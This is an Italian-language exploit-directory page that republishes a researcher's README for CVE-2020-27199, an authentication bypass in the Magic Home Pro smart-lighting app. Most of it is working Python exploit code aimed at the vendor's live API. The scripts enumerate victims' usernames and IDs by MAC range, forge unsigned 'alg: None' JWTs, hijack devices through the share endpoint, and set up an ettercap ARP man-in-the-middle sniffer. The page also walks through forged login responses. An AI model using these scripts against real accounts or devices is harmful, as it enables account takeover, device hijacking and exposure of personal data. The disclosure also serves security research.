Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-27199 — CVE-2020-27199 | Kitploit
Strumenti/GitHubGitHub/9lyph/cve-2020-27199
RicognizioneSicurezza IoTExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza MobileAutenticazioneSviluppo Payload
GitHub9lyph/cve-2020-27199

CVE-2020-27199

CVE-2020-27199

71 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2020-27199 (Magic Home Pro - Bypass dell'autenticazione)

magic-home-pro

Multiple vulnerabilità trovate nell'applicazione mobile Magic Home Pro utilizzata per interfacciarsi con il kit LED Strip RGB JadeHomic. La più significativa di queste vulnerabilità è un bypass dell'autenticazione (CVE-2020-27199), che consente in ultima analisi di prendere il controllo completo dell'intero gruppo di dispositivi di una vittima.

  • Di seguito sono descritti i passaggi di enumerazione che portano allo sfruttamento finale e al materiale PoC utilizzato per attuare l'enumerazione e l'exploit finale.

File PoC

magichome-forge.py - Forgiatore JWT, utilizzato per automatizzare l'acquisizione del dispositivo

magichome-sniffer.py - Sniffer di rete locale che cerca dispositivi suscettibili nella rete. Crea un elenco di dispositivi su cui eseguire attacchi.

magichome-switch.py - Consente di accendere i dispositivi

magichome-takeover.py - Payload che consente l'acquisizione riuscita dell'account di un utente

Lavoro preliminare alla scoperta

  • Android rooted
  • Rilevamento root bypassato tramite patching, ri-firma del JAR e ricostruzione dell'APK (necessario)
  • Bypass del certificate pinning Frida alla riscossa (necessario)

Applicazione

Magic Home Pro

Fornitore del prodotto

JadeHomic

Proprietario del controller WiFi

Suzhou SmartChip Semiconductor Co.,Ltd

Sito web del fornitore

JadeHomic

Riferimenti

Mitre

Exploit-db

SpiderLabs Blog

Base del codice del prodotto interessato

Magic Home Pro

Descrizione

URL di base: wifij01us.magichue.net

Enumerazione

Questa vulnerabilità consente a qualsiasi utente autenticato di utilizzare il proprio livello di autorizzazione corrente per interrogare endpoint non appartenenti ai propri prodotti registrati, tramite una chiamata API a /app/getBindedUserListByMacAddress/ZG001?macAddress=<indirizzo mac>. Ciò si traduce in una risposta HTTP che indica l'esistenza dell'endpoint e restituisce il nome utente, l'identificativo univoco dell'utente (userUniID) e l'ID univoco associato (bindedUniID) dell'endpoint associato.

Utilizzando l'interrogazione precedente, un attaccante può quindi sfruttare una richiesta POST non autorizzata all'API /app/sendCommandBatch/ZG001, utilizzando l'indirizzo mac appena enumerato per inviare comandi all'endpoint remoto usando comandi hex compatibili 71230fa3 e 71240fa4 che attivano rispettivamente l'accensione e lo spegnimento.

Forgiatura JWT basata sui dettagli raccolti sopra

Dopo aver completato l'enumerazione iniziale, è anche possibile forgiare un JWT utilizzando userID e uniID nei dati del payload JWT, di fatto declassando il token per utilizzare 'None' come algoritmo nella sezione header del JWT (vulnerabilità di bypass della firma). Sfruttando questa vulnerabilità, l'applicazione è suscettibile all'acquisizione del dispositivo da parte di un attaccante tramite una chiamata API remota a /app/shareDevice/ZG001 e utilizzando il parametro JSON friendUserID per aggiungere il dispositivo all'elenco dei dispositivi dell'attaccante, dando a quest'ultimo il controllo completo del dispositivo endpoint.

Crediti:

  • Medium
  • JWT_TOOL - ticarpi

Tipo di vulnerabilità

  • Bypass dell'autenticazione
  • Divulgazione di informazioni
  • Accesso non autorizzato
  • Escalation orizzontale dei privilegi

Informazioni aggiuntive

OUI

L'OUI descrive l'identificatore univoco dell'organizzazione per gli indirizzi MAC registrati presso un'organizzazione. Nel caso di JadeHomic, l'OUI magico è C8:2E:47, dove i primi tre byte corrispondono al produttore e i secondi tre byte corrispondono al numero di serie assegnato dal produttore. Nel nostro caso, l'identificatore del produttore è registrato presso Suzhou SmartChip Semiconductor Co., LTD.

Altro impatto CVE

Consente il bypass dell'autenticazione dell'applicazione mobile Magic Home Pro e quindi il controllo completo dell'intero gruppo di dispositivi di un utente vittima.

Vettori di attacco

  • Utente autenticato richiesto
  • Enumerazione riuscita del sistema finale esistente
  • Successivo invio di comandi batch a un endpoint remoto
  • Acquisizione del dispositivo
  • Bypass dell'autenticazione

Enumeratore PoC ed exploit del comando batch

Il proof of concept enumera sugli ultimi byte all'interno del range MAC e restituisce i risultati. Permette di testare l'esecuzione remota se ci si sente audaci.``` import requests import json import os from colorama import init from colorama import Fore, Back, Style import re

'''

  1. First Stage Authentication
  2. Second Stage Enumerate
  3. Third Stage Remote Execute '''

global found_macaddresses found_macaddresses = [] global outtahere outtahere = "" q = "q" global token

def turnOn(target, token):

root@kitploit:~
urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
array = {
    "dataCommandItems":[
        {"hexData":"71230fa3","macAddress":target}
    ]
}
data = json.dumps(array)
headersOn = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}
print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOn, data=data, headers=headersOn)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def turnOff(target, token):

root@kitploit:~
urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
array = {
    "dataCommandItems":[
        {"hexData":"71240fa4","macAddress":target}
    ]
}
data = json.dumps(array)
headersOff = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}
print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOff, data=data, headers=headersOff)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def lighItUp(target, token):

root@kitploit:~
outtahere = ""
q = "q"
if len(str(target)) < 12:
    print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
    while outtahere.lower() != q.lower():
        if outtahere == "0":
            turnOn(target, token)
        elif outtahere == "1":
            turnOff(target, token)
        outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)

def Main(): urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"

root@kitploit:~
data = {
    "userID":"<Valid Registered Email/Username>",
    "password":"<Valid Registered Password>",
    "clientID":""
}

headersAuth = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

# First Stage Authenticate

os.system('clear')
print (Fore.WHITE + "[+] Authenticating ...")
response = requests.post(urlAuth, json=data, headers=headersAuth)
resJsonAuth = response.json()
token = (resJsonAuth['token'])

# Second Stage Enumerate

print (Fore.WHITE + "[+] Enumerating ...")
macbase = "C82E475DCE"
macaddress = []
a = ["%02d" % x for x in range(100)]
for num in a:
    macaddress.append(macbase+num)

with open('loot.txt', 'w') as f:
    for mac in macaddress:
        urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
        params = {
            "macAddress":mac
        }

        headersEnum = {
            "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
            "Accept-Language": "en-US",
            "Content-Type": "application/json; charset=utf-8",
            "Accept": "application/json",
            "token": token,
            "Host": "wifij01us.magichue.net",
            "Connection": "close",
            "Accept-Encoding": "gzip, deflate"
        }

        response = requests.get(urlEnum, params=params, headers=headersEnum)
        resJsonEnum = response.json()
        data = (resJsonEnum['data'])
        if not data:
            pass
        elif data:
            found_macaddresses.append(mac)
            print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
            f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
        else:
            print (Fore.RED + "[-] No results found!")
            print(Style.RESET_ALL)

    if not found_macaddresses:
        print (Fore.RED + "[-] No MAC addresses retrieved")
    elif found_macaddresses:
        attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
        if (attackboolean.upper() == 'Y'):
            target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
            lighItUp(target, token)
        elif (attackboolean.upper() == 'N'):
            print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)
        else:
            print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)

if name == "main": Main()

root@kitploit:~
#### Enumerazione

![](https://assets.kitploit.com/production/public/readmes/14851/313dec37a245a36b311ba83f9bf03637209ab4b4bf5b0b51c283e53618544cfc.jpg)

#### Forgiatura di Token

##### Forgiatore di token PoC

- Utilizzando lo **userID** e **uniqID** ottenuti dopo un'enumerazione riuscita. Questo forgiature di token PoC genera un nuovo JWT firmato e bypassato.```
#!/usr/local/bin/python3

import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re
import time
from wsgiref.handlers import format_date_time
from datetime import datetime
from time import mktime

now = datetime.now()
stamp = mktime(now.timetuple())

'''
HTTP/1.1 200
Server: nginx/1.10.3
Content-Type: application/json;charset=UTF-8
Connection: close

"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
'''

def Usage():
    print (f"Usage: {sys.argv[0]} <username> <unique id>")

def Main(user, uniqid):
    os.system('clear')
    print ("[+] Encoding ...")
    print ("[+] Bypass header created!")
    print ("HTTP/1.1 200")
    print ("Server: nginx/1.10.3")
    print ("Date: "+str(format_date_time(stamp))+"")
    print ("Content-Type: application/json;charset=UTF-8")
    print ("Connection: close\r\n\r\n")

    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
    jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
    jwt_headerEncoded = url64.encode(jwt_header.strip())
    jwt_dataEncoded = url64.encode(jwt_data.strip())
    jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
    print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        Usage()
    else:
        Main(sys.argv[1], sys.argv[2])

Acquisizione del dispositivo

  • Exploit per acquisire il dispositivo che utilizza l'email dell'attaccante (un account registrato che verrà utilizzato per acquisire l'account target), l'email target (l'account da acquisire), l'indirizzo MAC target (associato all'indirizzo email target) e un token falsificato.
Exploit PoC per l'acquisizione del dispositivo```

#!/usr/local/bin/python3

import url64 import requests import json import sys import os from colorama import init from colorama import Fore, Back, Style import re

def Usage(): print (f"Usage: {sys.argv[0]} ")

def Main():

root@kitploit:~
attacker_email = sys.argv[1]
target_email = sys.argv[2]
target_mac = sys.argv[3]
forged_token = sys.argv[4]

os.system('clear')
print (Fore.WHITE + "[+] Sending Payload ...")
url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"

array = {"friendUserID":attacker_email, "macAddress":target_mac}

data = json.dumps(array)

headers = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":forged_token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

response = requests.post(url, data=data, headers=headers)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
    else:
        print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)

if name == "main": if len(sys.argv) < 5: Usage() else: Main()

root@kitploit:~
##### Esempio di scambio richiesta/risposta POST riuscito```
POST Request

POST /app/shareDevice/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token: <forged token, representing the target victim>
Content-Type: application/json; charset=utf-8
Content-Length: 72
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate

{"friendUserID":"<attackercontrolled email>","macAddress":"<victim mac address>"}

Response

HTTP/1.1 200 
Server: nginx/1.10.3
Date: Tue, 07 Jul 2020 05:31:33 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 31

{"code":0,"msg":"","data":true}

Sniffer di dispositivi Magic Home

  • Requisiti:
    • ettercap
    • Credenziali utente valide
  • L'intenzione è di eseguire questo script contro un segmento di rete in cui sei interessato a trovare dispositivi suscettibili.
  • Una volta trovati, esegui un attacco usando il menu degli attacchi all'interno dello script.``` #!/usr/bin/env python3

import socket import struct import platform import os import sys import requests import json from colorama import init from colorama import Fore, Back, Style import re import time, subprocess

loot = [] global choice choice = '' global outtahere outtahere = "" q = "q" global macAddress

def scan(): with open('sniffedDevices.txt', 'a+') as f: os.system('clear') print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL ) print (Fore.GREEN + "| Author: Victor Hanna (@9lyph) |"+ Style.RESET_ALL ) print (Fore.GREEN + "| Description: Magic Home Pro Sniffer |"+ Style.RESET_ALL ) print (Fore.GREEN + "| (CTRL^C to Quit) |"+ Style.RESET_ALL ) print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL ) print (Fore.WHITE + '[+] Configuring IP Forwarding'+ Style.RESET_ALL ) time.sleep(5) print (Fore.WHITE + '[+] Setting up MiTM'+ Style.RESET_ALL ) time.sleep(2) ipForward = subprocess.Popen('sudo echo 1 > /proc/sys/net/ipv4/ip_forward', shell=True) time.sleep(2) ettercap = subprocess.Popen('sudo ettercap -T -q -i eth0 -M arp /// > /dev/null &', shell=True) time.sleep(2) print (Fore.WHITE + '[+] Searching for Magic Home Device(s)'+ Style.RESET_ALL ) itsthere = [] while (True): conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003)) try: raw_data, addr = conn.recvfrom(65535) dst_mac, src_mac, proto, data = ethernet_frame(raw_data) if 'FF:FF:FF:FF:FF:FF' in dst_mac: # Suppress Broadcast traffic pass elif 'c8:2e:47'.upper() in src_mac: if src_mac in loot: pass else: print (Fore.WHITE + '[+] Device ' + src_mac + ' added to loot !'+ Style.RESET_ALL) loot.append(src_mac) f.write(src_mac + "\n") elif 'c8:2e:47'.upper() in dst_mac: if dst_mac in loot: pass else: print (Fore.WHITE + '[+] Device ' + dst_mac + ' added to loot !'+ Style.RESET_ALL) loot.append(dst_mac) f.write(dst_mac + "\n") else: pass except KeyboardInterrupt: print (Fore.WHITE + "[+] Stopping MiTM"+ Style.RESET_ALL) time.sleep(2) subprocess.Popen.kill(ettercap) print (Fore.WHITE + '[+] Reconfiguring IP Forwarding'+ Style.RESET_ALL) time.sleep(2) os.system('sudo echo 0 > /proc/sys/net/ipv4/ip_forward') menu()

def turnOn(target, token): urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001" array = { "dataCommandItems":[ {"hexData":"71230fa3","macAddress":target} ] }

root@kitploit:~
data = json.dumps(array)

headersOn = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOn, data=data, headers=headersOn)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Fore.WHITE + f"{target}" + Fore.GREEN + " Switched On" + Style.RESET_ALL)
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def turnOff(target, token): urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"

root@kitploit:~
array = {
    "dataCommandItems":[
        {"hexData":"71240fa4","macAddress":target}
    ]
}

data = json.dumps(array)
headersOff = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOff, data=data, headers=headersOff)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Fore.WHITE + f"{target}" + Fore.GREEN + " Switched Off" + Style.RESET_ALL)
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def lighItUp(target, token): outtahere = "" q = "q" if len(str(target)) < 12: print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL) elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()): print (outtahere.lower()) while outtahere.lower() != q.lower(): if outtahere == "0": turnOn(target, token) elif outtahere == "1": turnOff(target, token) outtahere = input(Fore.GREEN + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL) menu()

def attack(): with open('sniffedDevices.txt', 'rb') as f: os.system('clear') print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL) print (Fore.GREEN + "| Author: Victor Hanna (@9lyph) |"+ Style.RESET_ALL) print (Fore.GREEN + "| Description: Magic Home Pro Sniffer |"+ Style.RESET_ALL) print (Fore.GREEN + "| Attack Device : '1' |"+ Style.RESET_ALL) print (Fore.GREEN + "| Exit to Main Menu: '2' |"+ Style.RESET_ALL) print (Fore.GREEN + "| (CTRL^C to Quit) |"+ Style.RESET_ALL) print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL) print (Fore.WHITE + "[+] These are you available local targets:"+ Style.RESET_ALL) alreadyDone = [] for target in f.readlines(): macAddresses = ((target).replace(b":", b"")) if macAddresses in alreadyDone: continue else: alreadyDone.append(macAddresses) print (target.replace(b":", b"").decode('utf-8').strip())

root@kitploit:~
    choice = int(input ("Choice: "))
    if (choice == 1):
        macAddress = input("[+] Enter Device MAC (xxxxxxxxxxxx): ")
        urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"

        data = {
            "userID":"<!--Valid Username-->",
            "password":"<!--Valid Password-->",
            "clientID":""
        }

        headersAuth = {
            "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
            "Accept-Language": "en-US",
            "Accept": "application/json", 
            "Content-Type": "application/json; charset=utf-8",
            "Host": "wifij01us.magichue.net",
            "Connection": "close",
            "Accept-Encoding": "gzip, deflate"
        }
        print (Fore.WHITE + "[+] Authenticating ...")
        response = requests.post(urlAuth, json=data, headers=headersAuth)
        resJsonAuth = response.json()
        token = (resJsonAuth['token'])
        lighItUp(macAddress, token)
    elif (choice == 2):
        menu()
    else:
        attack()

def ethernet_frame(data): dst_mac, src_mac, proto = struct.unpack('!6s6sH', data[:14]) return get_mac_addr(dst_mac), get_mac_addr(src_mac), socket.htons(proto), data[14:]

def get_mac_addr(bytes_addr): bytes_str = map('{:02x}'.format, bytes_addr) return ':'.join(bytes_str).upper()

def menu(): os.system('clear') while (True):

root@kitploit:~
    print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Author: Victor Hanna (@9lyph)       |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Description: Magic Home Pro Sniffer |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Scan   : '1'                        |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Attack : '2'                        |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| (CTRL^C to Quit)                    |"+ Style.RESET_ALL)
    print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL)
    try:
        choice = (input ("Choice: "))
        if (int(choice) == 1):
            scan()
        elif (int(choice) == 2):
            attack()
    except KeyboardInterrupt:
        os.system ('sudo echo 0 > /proc/sys/net/ipv4/ip_forward')
        print("\nBye bye !\n")
        sys.exit()

if name == 'main': menu()

root@kitploit:~
### Bypass dell'autenticazione (Magic Home Pro) (CVE-2020-27199)
 
- Utilizzando la falsificazione del token JSON (JSON token forgery) combinata con le informazioni ottenute, ovvero l'Email della Vittima (Victim Email), ClientID e UniqID sulla base dell'enumerazione di cui sopra, è possibile bypassare il processo di autenticazione dell'App Mobile (Mobile App) manipolando la risposta HTTP e ottenere così l'accesso all'applicazione (Application) come vittima.

- L'attaccante utilizza l'applicazione Magic Home Pro impiegando un indirizzo email della vittima, una password arbitraria e il clientID

- L'attaccante può quindi manipolare la risposta HTTP utilizzando i dettagli del passaggio 1, il che consente di effettuare il bypass```
Original HTTP Login Request via Magic Home Pro Mobile app
 
POST /app/login/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token:
Content-Type: application/json; charset=utf-8
Content-Length: 117
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate
 
{"userID":"<victim userID>","password":"<arbitrary password>","clientID":"<arbitrary ClientID>"}

Original HTTP Response
 
HTTP/1.1 200
Server: nginx/1.10.3
Date: Thu, 08 Oct 2020 00:08:45 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 37
 
{"code":10033,"msg":"Password error"}

Edited HTTP Response
 
HTTP/1.1 200
Server: nginx/1.10.3
Date: Mon, 06 Jul 2020 12:32:02 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 907
 
{"code":0,"msg":"","data":{"webApi":"wifij01us.magichue.net/app","webPathOta":"http://wifij01us.magichue.net/app/ota/download","tcpServerController":"TCP,8816,ra8816us02.magichue.net","tcpServerBulb":"TCP,8815,ra8815us02.magichue.net","tcpServerControllerOld":"TCP,8806,mhc8806us.magichue.net","tcpServerBulbOld":"TCP,8805,mhb8805us.magichue.net","sslMqttServer":"ssl://192.168.0.112:1883","serverName":"Global","serverCode":"US","userName":"<victim userID>","userEmail":"<victim email>","userUniID":"<uniID gleaned from enumeration>"},"token":"<forged JWT based on gleaned data from API call>"}

Video PoC dell'Exploit

Magic Home PRO - Exploit

Scopritore/Crediti:

Victor Hanna di Exploit Security

Seguimi su

Mastodon Linkedin Youtube

Scarica lo strumento